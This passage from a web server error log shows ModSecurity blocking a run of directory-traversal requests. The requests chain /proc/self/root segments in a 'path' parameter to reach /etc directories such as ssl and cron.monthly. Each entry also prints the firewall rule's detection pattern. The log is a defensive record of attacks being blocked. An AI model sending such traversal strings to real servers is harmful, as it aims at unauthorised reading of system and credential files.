https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:25:46.278881 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:43532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gqgF0L0L-SsrnPo5hJQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:26:15.130406 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:39908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gxwF0L0L-SsrnPo5hSwAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:26:16.565755 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:53870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gyPXLqtnMIWvjpaKTPgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:26:18.587824 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:53994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gybninkcc-iUj5ApX6gAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:26:23.537816 2026] [mime_magic:error] [pid 9818:tid 140411590858496] (70014)End of file found: [client 74.7.241.31:53346] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/bacula
[Fri Mar 20 07:26:25.736279 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:44948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g0fqxLDW4GITHUkTfXQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:26:39.947060 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:53350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g3wF0L0L-SsrnPo5hbgAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:26:41.623984 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:54576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g4da6ubjKNq_cu4bNWwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:26:46.396475 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:54586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g5uoXxyEfFpUF8f966wAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:26:52.005111 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:44952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g7PqxLDW4GITHUkTfiwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:26:55.445084 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:43122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g7zJ3M9BSuKP7CAYT0gAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:26:59.082812 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:43134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g8_XLqtnMIWvjpaKTewAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:01.519010 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:36372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g9eoXxyEfFpUF8f96_wAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:27:02.129853 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:47526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g9vHIg5MgXLBnicPxmwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:03.867021 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:47526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g9_HIg5MgXLBnicPxngAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:07.503868 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:47538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g-xCii7xarUs8iHZgzQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:08.877921 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:47548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0g_BCii7xarUs8iHZgzgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:31.063698 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:47548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hExCii7xarUs8iHZg8AAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:40.877241 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:39864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hHNa6ubjKNq_cu4bNoQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:42.207385 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.241.31:39298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hHl1pVZ5mVmJwsFMpVgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:48.850625 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:36188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hJDJ3M9BSuKP7CAYUDAAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:50.181415 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:57956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hJrninkcc-iUj5ApYNgAAA5A"], referer: 